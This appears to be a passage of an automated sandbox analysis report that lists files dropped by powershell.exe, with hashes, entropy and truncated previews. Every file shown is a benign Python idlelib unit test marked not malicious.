                              Preview:"Test run, coverage 54%."....from idlelib import run..import io..import sys..from test.support import captured_output, captured_stderr..import unittest..from unittest import mock..import idlelib..from idlelib.idle_test.mock_idle import Func....idlelib.testing = True # Use {} for executing test user code.......class ExceptionTest(unittest.TestCase):.... def test_print_exception_unhashable(self):.. class UnhashableException(Exception):.. def __eq__(self, other):.. return True.... ex1 = UnhashableException('ex1').. ex2 = UnhashableException('ex2').. try:.. raise ex2 from ex1.. except UnhashableException:.. try:.. raise ex1.. except UnhashableException:.. with captured_stderr() as output:.. with mock.patch.object(run, 'cleanup_traceback') as ct:.. ct.side_effect = lambda t, e: t.. run.print_exception
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):810
                              Entropy (8bit):4.591537338338638
                              Encrypted:false
                              SSDEEP:12:FLJhTl0rRpHoRjrz1hjBexXGispqj7ze4XjrRkea2NZHhYHGHQK2N7Dc02aLJv:pJ8rIXJB6X7zlHRg2fKmH8D6al
                              MD5:089CF1F5A5E55A269A99C71BDDFFD89A
                              SHA1:7EE9AC782A1259364AD6744DC59E58CAFFE6010F
                              SHA-256:C39FF558C4B3DAA525FBBBF1AA21F9DDBDF85B8EC1F8A9B70DC5B23E3F787809
                              SHA-512:ECB2B0E5D073214F84179271FD57E42C0725052A77A1619D8E09B24CEB085A598697459CE1DA2CCD5D0C4C36B445CD1E57E8CECD713ECDEAD91AFC437D2DF735
                              Malicious:false
                              Preview:"Test runscript, coverage 16%."....from idlelib import runscript..import unittest..from test.support import requires..from tkinter import Tk..from idlelib.editor import EditorWindow......class ScriptBindingTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. ew = EditorWindow(root=self.root).. sb = runscript.ScriptBinding(ew).. ew._close()......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):523
                              Entropy (8bit):4.618711056645856
                              Encrypted:false
                              SSDEEP:12:PhJeRpH7CkLRjrzEpKP4XjrHGEt02aLJv:PirbjLfyHmOal
                              MD5:D681A059805CD3913F3E68F7609F8DCB
                              SHA1:47B589290032E17BB7E26D26DBFCE0E2C422058C
                              SHA-256:7B63939B3D15478A401E9496991D75BE3A7ED8A4414858A08BB277206B0620D9
                              SHA-512:868C34C5DD78BC9D2B5996F3BBA0B146B16DB82841FF8E5D280D51662A9F83544624F79560DD75052D48BA44314DEC1EA28AE1A39173B0CCEC9AF5139C7D5EC7
                              Malicious:false
                              Preview:"Test scrolledlist, coverage 38%."....from idlelib.scrolledlist import ScrolledList..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk......class ScrolledListTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().... @classmethod.. def tearDownClass(cls):.. cls.root.destroy().. del cls.root...... def test_init(self):.. ScrolledList(self.root)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2539
                              Entropy (8bit):4.615322855613091
                              Encrypted:false
                              SSDEEP:48:x8rfL9cRRKEhrGcbb3DQK4+h3b3gmhij+hifhivhclRhKCGzprpNm8ai:x8rfL9QKEhrGcbjn4+Jjgmcj+cfcvul8
                              MD5:7AA63B4AA5002DB21314F0115C86F6DF
                              SHA1:B4BB3B8D6133FBCEB90F35D03C1709C5AE066AE0
                              SHA-256:CEFE25B6190417849C1B47CBA06D47EC1BE2CC7740BE00D03DD8AA5D68970A7B
                              SHA-512:9B69207B21157181A2B08B37EDF0579205ABB77239BEA57B5B6DDD3C0F25A67479F8CD11330223C22CE7AEEA6E6D32059E5EAFE6AFD7EE230139878A4C257EDE
                              Malicious:false
                              Preview:"Test search, coverage 69%."....from idlelib import search..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk, Text, BooleanVar..from idlelib import searchengine....# Does not currently test the event handler wrappers...# A usage test should simulate clicks and check highlighting...# Tests need to be coordinated with SearchDialogBase tests..# to avoid duplication.......class SearchDialogTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().... @classmethod.. def tearDownClass(cls):.. cls.root.destroy().. del cls.root.... def setUp(self):.. self.engine = searchengine.SearchEngine(self.root).. self.dialog = search.SearchDialog(self.root, self.engine).. self.dialog.bell = lambda: None.. self.text = Text(self.root).. self.text.insert('1.0', 'Hello World!').... def test_find_again(self):.. # Search for various expressions.. text = sel
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5851
                              Entropy (8bit):4.553889103667144
                              Encrypted:false
                              SSDEEP:96:gsrIL4Ek8U6pAB6kE9TcaIDMGg+5r/GviF9nUJHUy9/yVgvzorvlF6Uh49ag4vmt:gOgU6q5E9TcdDMGg+5r/GviF9nUJHUyX
                              MD5:93827D8D2682087E0803CF425ACAC7F3
                              SHA1:4F0263B37FC750E67679957ABFAA00B6CCBEF389
                              SHA-256:A57AAC6C593C3FBA1FD99839B0AA8B5A064143BFDF5771E356583877026DB204
                              SHA-512:933A79A2CD937D9C1D0F204E5164CAE26109AB0BA17498892980E31F3F47273F60AFE8FC4E26CDCCEBA4B137847BD9E18648DAD767F88FD0A9EB4C8FEBA00CA4
                              Malicious:false
                              Preview:"Test searchbase, coverage 98%."..# The only thing not covered is inconsequential --..# testing skipping of suite when self.needwrapbutton is false.....import unittest..from test.support import requires..from tkinter import Text, Tk, Toplevel..from tkinter.ttk import Frame..from idlelib import searchengine as se..from idlelib import searchbase as sdb..from idlelib.idle_test.mock_idle import Func..## from idlelib.idle_test.mock_tk import Var....# The ## imports above & following could help make some tests gui-free...# However, they currently make radiobutton tests fail...##def setUpModule():..## # Replace tk objects used to initialize se.SearchEngine...## se.BooleanVar = Var..## se.StringVar = Var..##..##def tearDownModule():..## se.BooleanVar = BooleanVar..## se.StringVar = StringVar......class SearchDialogBaseTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().... @classmethod.. def tearDownClass
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11920
                              Entropy (8bit):4.629421233745114
                              Encrypted:false
                              SSDEEP:192:vM4e9N7EVKOoRwQ1j7IEpIi7c9ZN1BlBYjG2Z2eqI7/jfnKiCZAttDIPopb6GGV+:04m7Yr6XpIi7c9ZN1BlBYjG2Z2eqI7/r
                              MD5:2784FBD31BE29423242C6ABD3799F612
                              SHA1:82FFB2CB2B519ADA9978B48590FB1F0E5656002D
                              SHA-256:CD1CA903CF5F79683BEA784DA0157659F0B12BACA04F5D54EA49957F2089EF5B
                              SHA-512:4697FD570AF780AF9A2B1A6417EE77C0010302D9AB1FCFAD977C152F0CF48BD721AB0012AD6D741C04156B11535384B84C952DA69032DCA113FD2C86E793F15B
                              Malicious:false
                              Preview:"Test searchengine, coverage 99%."....from idlelib import searchengine as se..import unittest..# from test.support import requires..from tkinter import BooleanVar, StringVar, TclError # ,Tk, Text..from tkinter import messagebox..from idlelib.idle_test.mock_tk import Var, Mbox..from idlelib.idle_test.mock_tk import Text as mockText..import re....# With mock replacements, the module does not use any gui widgets...# The use of tk.Text is avoided (for now, until mock Text is improved)..# by patching instances with an index function returning what is needed...# This works because mock Text.get does not use .index...# The tkinter imports are used to restore searchengine.....def setUpModule():.. # Replace s-e module tkinter imports other than non-gui TclError... se.BooleanVar = Var.. se.StringVar = Var.. se.messagebox = Mbox....def tearDownModule():.. # Restore 'just in case', though other tests should also replace... se.BooleanVar = BooleanVar.. se.StringVar = StringVa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):27629
                              Entropy (8bit):4.610259264522899
                              Encrypted:false
                              SSDEEP:384:6+xTHGAImbl2qzwq1+rwWoOeoztB+JQluFC37CcB1XlQz+JHPdc:6+xTHfJ+rD9oQ7R/O
                              MD5:8A00164EBD4C1B90FB3AB7B59A9E5E4C
                              SHA1:7EF5AAE52C380CAD7C9AAE85FDAC223BBD475D2F
                              SHA-256:4E02C11E74350B5D57E0616627AB185D5251A4C1902C7A166A36F776390F0DA0
                              SHA-512:5C46E696BCB07128648D80F56A169E8F19013990C4FC71CDB167977AF02B2CBD54605B90474FF0B884510902A2BA312A472F7D87AB78434F2FF1818B22AF615D
                              Malicious:false
                              Preview:"""Test sidebar, coverage 85%"""..from textwrap import dedent..import sys....from itertools import chain..import unittest..import unittest.mock..from test.support import requires, swap_attr..from test import support..import tkinter as tk..from idlelib.idle_test.tkinter_testing_utils import run_in_tk_mainloop....from idlelib.delegator import Delegator..from idlelib.editor import fixwordbreaks..from idlelib.percolator import Percolator..import idlelib.pyshell..from idlelib.pyshell import fix_x11_paste, PyShell, PyShellFileList..from idlelib.run import fix_scaling..import idlelib.sidebar..from idlelib.sidebar import get_end_linenumber, get_lineno......class Dummy_editwin:.. def __init__(self, text):.. self.text = text.. self.text_frame = self.text.master.. self.per = Percolator(text).. self.undo = Delegator().. self.per.insertfilter(self.undo).... def setvar(self, name, value):.. pass.... def getlineno(self, index):.. return int(fl
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):20122
                              Entropy (8bit):4.745638125263061
                              Encrypted:false
                              SSDEEP:384:qNz0zajhvj0f33h+7pw6nMVw2xJ/xxYhdd:q10zq1wfh+7pw6nMXL/add
                              MD5:196E0E73FFE5D2D14C81264970113914
                              SHA1:83450E4B60E688C97AA2B9B3A4584DF6EBA48035
                              SHA-256:C3FCD3087A680837EDABD847768B4B9C9E49D07B717E8A35A6E081D00CFE5A3E
                              SHA-512:0DDF6DA87F18A263CF70D2F63660AF2386692C811B62E774156AAA8EAB4544B0FAABA8CC687987A342634C9093DD28533CAAA83E91A47BD3B8925EE62F3A0604
                              Malicious:false
                              Preview:"Test squeezer, coverage 95%"....from textwrap import dedent..from tkinter import Text, Tk..import unittest..from unittest.mock import Mock, NonCallableMagicMock, patch, sentinel, ANY..from test.support import requires....from idlelib.config import idleConf..from idlelib.percolator import Percolator..from idlelib.squeezer import count_lines_with_wrapping, ExpandingButton, \.. Squeezer..from idlelib import macosx..from idlelib.textview import view_text..from idlelib.tooltip import Hovertip....SENTINEL_VALUE = sentinel.SENTINEL_VALUE......def get_test_tk_root(test_instance):.. """Helper for tests: Create a root Tk object.""".. requires('gui').. root = Tk().. root.withdraw().... def cleanup_root():.. root.update_idletasks().. root.destroy().. test_instance.addCleanup(cleanup_root).... return root......class CountLinesTest(unittest.TestCase):.. """Tests for the count_lines_with_wrapping function.""".. def check(self, expected, text, linewidth):..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1032
                              Entropy (8bit):4.574212437632088
                              Encrypted:false
                              SSDEEP:24:XgrIoPANu5lV7zlUU25KmI+SfXlMpXl7tZkZal:XgrIot5lVXqPcXlM5l7j6al
                              MD5:260649AF78677B91666A3206E4CF9FC9
                              SHA1:E8E09CA23155865D90F6CA691701F3C1864CDC9A
                              SHA-256:BB1E0F9E9587E303D724566751DE1D5964DC58AEA435531EFB026DEF43D722EA
                              SHA-512:504BF9E24D327513709E0055E68356F1B2616385B597751244A0AA65D50B126FD1CA9FF8526FF29F47A1BB79312FAAC4938487C2C0F8B00EDF3C69388D3077F9
                              Malicious:false
                              Preview:"Test stackviewer, coverage 63%."....from idlelib import stackviewer..import unittest..from test.support import requires..from tkinter import Tk....from idlelib.tree import TreeNode, ScrolledCanvas......class StackBrowserTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.... requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.... cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. try:.. abc.. except NameError as exc:.. sb = stackviewer.StackBrowser(self.root, exc).. isi = self.assertIsInstance.. isi(stackviewer.sc, ScrolledCanvas).. isi(stackviewer.item, stackviewer.StackTreeItem).. isi(stackviewer.node, TreeNode)......if __name__ == '__main__':..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1174
                              Entropy (8bit):4.610107532682017
                              Encrypted:false
                              SSDEEP:24:gpeS5rIAE7zlHRVmOUfgK9GKcQaXCl79KcMKYrBFal:Sp5rIAEX3soI6aQcNaPal
                              MD5:7ABC742ED9E6EB1E3BB47E012A692B53
                              SHA1:977DD1DC4879B64C12721060B4301EE3A5B71A6D
                              SHA-256:D2760DA19ADD51C076B561934F8D6DFC14F2AA1459DB22EB56341A06659D33B4
                              SHA-512:B359BA017AD33A6DC85BFB8D64C48A9892DF258A02D213861E061A2F88F3BA2C17BC4DF81181F7493E97F76098DD85AEFA80565FE5D51912F2D7DDDAAE633440
                              Malicious:false
                              Preview:"Test statusbar, coverage 100%."....from idlelib import statusbar..import unittest..from test.support import requires..from tkinter import Tk......class Test(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_init(self):.. bar = statusbar.MultiStatusBar(self.root).. self.assertEqual(bar.labels, {}).... def test_set_label(self):.. bar = statusbar.MultiStatusBar(self.root).. bar.set_label('left', text='sometext', width=10).. self.assertIn('left', bar.labels).. left = bar.labels['left'].. self.assertEqual(left['text'], 'sometext').. self.assertEqual(left['width'], 10).. bar.set_label('left', text='revised text').. self.assertEqual(left['text'], 'revised text').. bar.se
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7206
                              Entropy (8bit):4.513183391055591
                              Encrypted:false
                              SSDEEP:96:PR0rIs9ummFA2xwLdLLUaLxn5Lo93dl59e3JyC:PR2xswLdLLUaLxn5Lo93dDM0C
                              MD5:11ABFC8E0B9D815531464D4E026A93A0
                              SHA1:4214839C8EAA8486E68766A35E464F6D2708C5CD
                              SHA-256:A2CBA8C23D68B6C26F08E525231491689092BADBC78948032F2A5F2A20484944
                              SHA-512:59BF29DC7D5A9B9547E81A2EA4B701C2A27A7C2D71CAAA1F7DEA2EEF48A4591191A6D94A86D7A4BEA26A7AFC025F8F66D91C93DEC41A226D8B7BC08201514D45
                              Malicious:false
                              Preview:''' Test mock_tk.Text class against tkinter.Text class....Run same tests with both by creating a mixin class...'''..import unittest..from test.support import requires..from _tkinter import TclError....class TextTest:.. "Define items common to both sets of tests.".... hw = 'hello\nworld' # Several tests insert this after initialization... hwn = hw+'\n' # \n present at initialization, before insert.... # setUpClass defines cls.Text and maybe cls.root... # setUp defines self.text from Text and maybe root..... def test_init(self):.. self.assertEqual(self.text.get('1.0'), '\n').. self.assertEqual(self.text.get('end'), '').... def test_index_empty(self):.. index = self.text.index.... for dex in (-1.0, 0.3, '1.-1', '1.0', '1.0 lineend', '1.end', '1.33',.. 'insert'):.. self.assertEqual(index(dex), '1.0').... for dex in 'end', 2.0, '2.1', '33.44':.. self.assertEqual(index(dex), '2.0').... def test_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7597
                              Entropy (8bit):4.714300449733398
                              Encrypted:false
                              SSDEEP:192:LQ3Z6hDKlsmWoyxQxXQKiY9/Mj36/xj34k:G6hOKmWlxQtfiYI3k3D
                              MD5:76DFE6B6F8303C183DA6BA22BAD7F0FF
                              SHA1:7390FCAE0EE0B1CB277EB64936EA2BB658469059
                              SHA-256:06DA4E9636798407C88563A0B734B8E68E1008A48333612406DAA4D6B0EA6382
                              SHA-512:CC2D5156C1A07E5300D37F9E66D996C9F9AF58726CE06B4C00890913888DCF29791C36FA30A6324339DAAB389C09AB45A2F61B4AC45B97079E98609D155333E8
                              Malicious:false
                              Preview:"""Test textview, coverage 100%.....Since all methods and functions create (or destroy) a ViewWindow, which..is a widget containing a widget, etcetera, all tests must be gui tests...Using mock Text would not change this. Other mocks are used to retrieve..information about calls..."""..from idlelib import textview as tv..from test.support import requires..requires('gui')....import os..import unittest..from tkinter import Tk, TclError, CHAR, NONE, WORD..from tkinter.ttk import Button..from idlelib.idle_test.mock_idle import Func..from idlelib.idle_test.mock_tk import Mbox_func....def setUpModule():.. global root.. root = Tk().. root.withdraw()....def tearDownModule():.. global root.. root.update_idletasks().. root.destroy().. del root....# If we call ViewWindow or wrapper functions with defaults..# modal=True, _utest=False, test hangs on call to wait_window...# Have also gotten tk error 'can't invoke "event" command'.......class VW(tv.ViewWindow): # Used in ViewWin
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5546
                              Entropy (8bit):4.646901203049652
                              Encrypted:false
                              SSDEEP:96:L6Crf0C5JU7Cxj6OU2QzL4neQ8v0qQb3QB0JFekbqQnacXqQnacuCtR1GBqQwaBK:LF86xiUkcnnJFekbucXucuCtrGBtBV6h
                              MD5:6B7D9233BB4566047E5D6B7D862A9908
                              SHA1:1077291B0C5EB9EE57ABB9EA4244293EE7888985
                              SHA-256:B2F02F500266A3EF9047F631AC8AA2596F9FA59686A691F2C2E6DB4788BB0DDA
                              SHA-512:439919C965B75576FFF57E747C860C118C4FE6BA8E92D7F35156195CBB4FED0A8C478CCB2F1F86FC6FED8FCA2BBE5A0B1205F392B9D1CDD7C2BA55ED75EEF052
                              Malicious:false
                              Preview:"""Test tooltip, coverage 100%.....Coverage is 100% after excluding 6 lines with "# pragma: no cover"...They involve TclErrors that either should or should not happen in a..particular situation, and which are 'pass'ed if they do..."""....from idlelib.tooltip import TooltipBase, Hovertip..from test.support import requires..requires('gui')....from functools import wraps..import time..from tkinter import Button, Tk, Toplevel..import unittest......def setUpModule():.. global root.. root = Tk()....def tearDownModule():.. global root.. root.update_idletasks().. root.destroy().. del root......def add_call_counting(func):.. @wraps(func).. def wrapped_func(*args, **kwargs):.. wrapped_func.call_args_list.append((args, kwargs)).. return func(*args, **kwargs).. wrapped_func.call_args_list = [].. return wrapped_func......def _make_top_and_button(testobj):.. global root.. top = Toplevel(root).. testobj.addCleanup(top.destroy).. top.title("Test
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1812
                              Entropy (8bit):4.568356827769023
                              Encrypted:false
                              SSDEEP:24:LEvS1WrbjL2kzlHm/LCKMDsWl52C59mqEMo0aBAlNWNRScQRSc9FxN+itlUDsal:L1QrfL2M/7suQxq3zaB3NRbQRbvUDsal
                              MD5:7E0F964F0DDE0952EF41052AA2506A5C
                              SHA1:ABAC523BA59B680778280B9A7DACF9323DCCD9A2
                              SHA-256:266AD30F2F7A299A15AE7F2222568FB318276FAF74BE49F08B8B483692040931
                              SHA-512:1EDD44C19DA568352AC45E78D5CE16D8C876022C2A33660200C6ED9A0AFFB2A43FF6A92C590D932E62C55A7A0C026F23A67F9D7FD6A8B4BB38706B9745ECFB8D
                              Malicious:false
                              Preview:"Test tree. coverage 56%."....from idlelib import tree..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk, EventType, SCROLL......class TreeTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.destroy().. del cls.root.... def test_init(self):.. # Start with code slightly adapted from htest... sc = tree.ScrolledCanvas(.. self.root, bg="white", highlightthickness=0, takefocus=1).. sc.frame.pack(expand=1, fill="both", side='left').. item = tree.FileTreeItem(tree.ICONDIR).. node = tree.TreeNode(sc.canvas, None, item).. node.expand()......class TestScrollEvent(unittest.TestCase):.... def test_wheel_event(self):.. # Fake widget class containing `yview` only... class _Widget:.. def __init__(widget, *expected):..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4363
                              Entropy (8bit):4.540531393241992
                              Encrypted:false
                              SSDEEP:96:o7rf0D8CiY0wU7MYzIYRysYzwGkkAcfgyGdsnFGfC:skdU7MYzIYRysYdkkARyGdscfC
                              MD5:6EE8DE74FCACA625F726D32BCAB1D3CC
                              SHA1:4F1A5B00B9EFDB79293010B39593EED8E769BDDF
                              SHA-256:FF7DFF12D672FD67D763456EA3267077BFC8EAA6C46C1DFCD9185CC61E5615FD
                              SHA-512:3FEA7446C9A4B53D2FD845111192FA4B2B8A88D806CAC1A3249ABFB61111E1D7B50D7BFA711CA4F162461F06D4D64B49C48D0A0A8AA98169A3CCDBF4299E2029
                              Malicious:false
                              Preview:"Test undo, coverage 77%."..# Only test UndoDelegator so far.....from idlelib.undo import UndoDelegator..import unittest..from test.support import requires..requires('gui')....from unittest.mock import Mock..from tkinter import Text, Tk..from idlelib.percolator import Percolator......class UndoDelegatorTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.text = Text(cls.root).. cls.percolator = Percolator(cls.text).... @classmethod.. def tearDownClass(cls):.. cls.percolator.redir.close().. del cls.percolator, cls.text.. cls.root.destroy().. del cls.root.... def setUp(self):.. self.delegator = UndoDelegator().. self.delegator.bell = Mock().. self.percolator.insertfilter(self.delegator).... def tearDown(self):.. self.percolator.removefilter(self.delegator).. self.text.delete('1.0', 'end').. self.delegator.resetcache().... def test_undo_event(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):322
                              Entropy (8bit):4.684750456551524
                              Encrypted:false
                              SSDEEP:6:np5oHX0hT3FvCGxwtsXrz2cbECyAhXfa5N4bCFAjaj/jVv:njBhT3F6iERABhb02aLJv
                              MD5:3C9F4D860E4ACB9BA819649F906BAF3B
                              SHA1:0250E71448DF2725D378E8C26F9346AEFFDB0442
                              SHA-256:8B2ACDFBBBC13AB1D92ECCD56D2FB8F2DD31EE03A2B0D46E21B7F7E0DCCF7902
                              SHA-512:0CF78E7606E8EB25F8A2537F774E8B7D948F5608F304D6E85538018970907D16AD0FBBD1158426D8971AF85C5410C59B799F568BF732E6FB396808CC44CA8A6A
                              Malicious:false
                              Preview:"""Test util, coverage 100%"""....import unittest..from idlelib import util......class UtilTest(unittest.TestCase):.. def test_extensions(self):.. for extension in {'.pyi', '.py', '.pyw'}:.. self.assertIn(extension, util.py_extensions)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2813
                              Entropy (8bit):4.693564963010456
                              Encrypted:false
                              SSDEEP:48:cWbcuURbNpDr780utRYdZ7QHrub0AFJTM6T4QC8irsPb0YJTM6TXal:55URJpDrwj+nJzTZTc6hTZTXk
                              MD5:DDA4E251A2594D78C7CE572A488F7BDF
                              SHA1:D56343257B801D9173A44ED24F1C0C911065FF72
                              SHA-256:2C47F4EBCDB0FA7670DF468F9E6E7808D2AA1EBCB6A37DEEBCB5FF6D4B4F3F6E
                              SHA-512:E4FBC5A74E5720C8F9657A7377ED892A3ADE81C619EC920E2945D5EB955D4493DBE0AC0EBD516D56F77CC7221ADC77D9B049FBC1F25B6037CDCECA4CC3408AE5
                              Malicious:false
                              Preview:'''Test warnings replacement in pyshell.py and run.py.....This file could be expanded to include traceback overrides..(in same two modules). If so, change name...Revise if output desusertion changes (http://bugs.python.org/issue18318)...Make sure warnings module is left unaltered (http://bugs.python.org/issue18081)...'''..from idlelib import run..from idlelib import pyshell as shell..import unittest..from test.support import captured_stderr..import warnings....# Try to capture default showwarning before Idle modules are imported...showwarning = warnings.showwarning..# But if we run this file within idle, we are in the middle of the run.main loop..# and default showwarnings has already been replaced...running_in_idle = 'idle' in showwarning.__name__....# The following was generated from pyshell.idle_formatwarning..# and checked as matching expectation...idlemsg = '''..Warning (from warnings module):.. File "test_warning.py", line 99.. Line of code..UserWarning: Test..'''..shellmsg =
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1120
                              Entropy (8bit):4.631177743431976
                              Encrypted:false
                              SSDEEP:12:bphTRLj0RpHoRjrzWhfWDYwJAHSppOj7ze4Xj3hrAea2NZBhYHGQwjusdf3PV02k:bpj0rIbhCh7zldU25Km+shXal
                              MD5:8796A4EE770B7E5B05C911A548AAF38D
                              SHA1:BFF9F130E6311C4C11192E640A51FCBDB09651A1
                              SHA-256:A05CBCC546301152A9CE43D537D6B21C2318355F33BFCC38A785FACCC8751500
                              SHA-512:4249A2C77CF52E8E954141DA1F7647B8396F14E08FA1060CADC1997CD819778935D966E3D46276D9C739EAB845D951FC146F11A93948264663F1E26A7BC26AA9
                              Malicious:false
                              Preview:"Test window, coverage 47%."....from idlelib import window..import unittest..from test.support import requires..from tkinter import Tk......class WindowListTest(unittest.TestCase):.... def test_init(self):.. wl = window.WindowList().. self.assertEqual(wl.dict, {}).. self.assertEqual(wl.callbacks, []).... # Further tests need mock Window.......class ListedToplevelTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. window.registry = set().. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. window.registry = window.WindowList().. cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.... win = window.ListedToplevel(self.root).. self.assertIn(win, window.regist
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1038
                              Entropy (8bit):4.613318204928801
                              Encrypted:false
                              SSDEEP:24:B7Y9rIXJB6eE7zN4Rr8Rg2fKmbV6oHsHz6o5CV6oFrYal:B78rIXJYeEXCaxTEoHsHmo8EoGal
                              MD5:52F237CB98FE67EA12732AB24388C08C
                              SHA1:61F108DFC43DC5FD4269E69DA84979CFA71158FB
                              SHA-256:2E4DA36EBE1543CFCA2531AD87053188E12764D28A8DDFEE2749800C2DF3A4BD
                              SHA-512:3ABFB6EAD8CD086D9712E174962DCE9C8C1D9D60A32D91FA5B2EED58EFA76D494E14E8A95EAFD2E5B5C715E05F473E9CC40C3DCF71C85540A8F1C9CD4651BBB2
                              Malicious:false
                              Preview:"Test zoomheight, coverage 66%."..# Some code is system dependent.....from idlelib import zoomheight..import unittest..from test.support import requires..from tkinter import Tk..from idlelib.editor import EditorWindow......class Test(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.editwin = EditorWindow(root=cls.root).... @classmethod.. def tearDownClass(cls):.. cls.editwin._close().. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. zoom = zoomheight.ZoomHeight(self.editwin).. self.assertIs(zoom.editwin, self.editwin).... def test_zoom_height_event(self):.. zoom = zoomheight.ZoomHeight(self.editwin).. zoom.zoom_height_event()......if __name__ == '__main
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4607
                              Entropy (8bit):4.647937908558207
                              Encrypted:false
                              SSDEEP:96:zurI0RoJ1Ob/bVfkKwkvx8GRHcSLLkyZsEC55yZlk:QaGbVfnx8GSSLLkyZ255yZlk
                              MD5:D2D09537C5BB6897E5FC5CB3FA964228
                              SHA1:B14C428B0B375D69C72D48C085EDDAE21A819BFA
                              SHA-256:AB488206E6B0F6C4F0E5CBF626A2BD3A13B123EF11B009558CF97A8876ACADCB
                              SHA-512:DC03CDB967CEDBEE8CEC2D45441B06AF629161F8222D4A92E63FF0BC781F8E2C24F8460E15A202304622D7727474E52E84E92D13691F097F109AE1F96DE00BC2
                              Malicious:false
